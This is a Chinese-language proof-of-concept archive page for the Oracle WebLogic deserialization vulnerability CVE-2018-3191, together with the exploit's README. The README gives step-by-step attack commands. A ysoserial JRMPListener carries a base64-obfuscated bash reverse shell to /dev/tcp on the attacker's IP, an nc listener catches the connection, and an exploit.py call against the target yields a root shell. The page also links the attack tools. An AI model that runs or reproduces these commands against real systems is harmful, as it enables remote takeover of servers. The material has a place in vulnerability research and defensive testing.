支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 736afeb800233e4068ee53b325302366bb7e5b95

来源
关联漏洞
标题:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2018-3191)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0版本、12.1.3.0版本和12.2.1.3版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据
Description
CVE-2018-3191 反弹shell
介绍
# CVE-2018-3191
CVE-2018-3191 反弹shell
本地ip:172.16.38.1
Weblogic:172.16.38.174:7001
1、	本地执行
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
 
然后执行 nc -lvv 7777
 
(1)	其中的 bash 命令为避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义,进行了base64转码解码的操作,明文为 bash -i >& /dev/tcp/172.16.38.1/7777 0>&1
(2)	此操作在本地监听一个JRMPListener,接收被攻击的weblogic 的请求,并执行指定的bash 反弹命令。
(3)	Nc 监听7777等待weblogic 主机反弹bash连接。
2、	执行
python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222,利用漏洞使weblogic 访问远程rmi服务,并执行bash反弹命令。
 

3、	nc监听的端口收到反弹的bash,root权限。
 
攻击所需工具:
ysoserial-master.jar //反序列化利用工具https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload生成工具
https://github.com/voidfyoo/CVE-2018-3191/releases
exploit.py //weblogic t3协议发送工具,集成CVE-2018-3191 payload
文件快照

[4.0K] /data/pocs/736afeb800233e4068ee53b325302366bb7e5b95 ├── [8.0K] exploit.py └── [1.3K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。